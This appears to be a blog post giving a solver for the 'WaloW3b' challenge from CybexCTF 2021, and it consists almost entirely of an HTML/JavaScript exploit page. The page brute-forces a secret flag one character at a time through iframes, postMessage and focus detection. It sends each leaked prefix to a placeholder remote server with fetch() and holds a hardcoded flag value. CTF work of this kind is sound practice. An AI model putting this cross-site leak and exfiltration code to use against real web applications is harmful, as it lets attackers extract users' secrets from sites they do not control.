CybexCTF 2021’s WaloW3b solver.
Código fuente: github.
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
const localURL = "https://127.0.0.1:4000"
const remoteURL = "https://your.server"
const alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"!¡¿?&%'(),-/:;<=>@[\\]_`{}~".split("");
let known = "CYBEX{¡wAlO_`L0v3S`_¿f0cUs?&Sam3SiT3!}";
let iterator = 0;
if (location.search.substr(1)) {
window.addEventListener("message", (event) => {
const frame = document.createElement('iframe');
frame.src = `${localURL}/walomsg?flag=${encodeURIComponent(event.data)}&msg=foo#msg`;
frame.onload = function () {
setTimeout(() => {
if (document.activeElement != document.body) {
event.source.postMessage(event.data, "*");
} else {
event.source.postMessage("justCloseMe", "*");
}
}, 500);
}
document.body.appendChild(frame);
});
} else {
window.addEventListener("message", (event) => {
if (event.data != "justCloseMe") {
known = event.data;
fetch(`${remoteURL}/FLAG/${encodeURIComponent(known)}`)
}
event.source.close();
});
setInterval(function () {
let char = alphabet[iterator];
console.log(`Testing ${known}(${char})`);
let win = window.open(`${location.href}?foo`, "_blank");
win.addEventListener("load", function () {
win.postMessage(`${known + char}`, "*");
})
if (iterator == alphabet.length - 1) {
iterator = 0;
} else {
++iterator;
}
}, 50);
}
</script>
</body>
</html>
Read other posts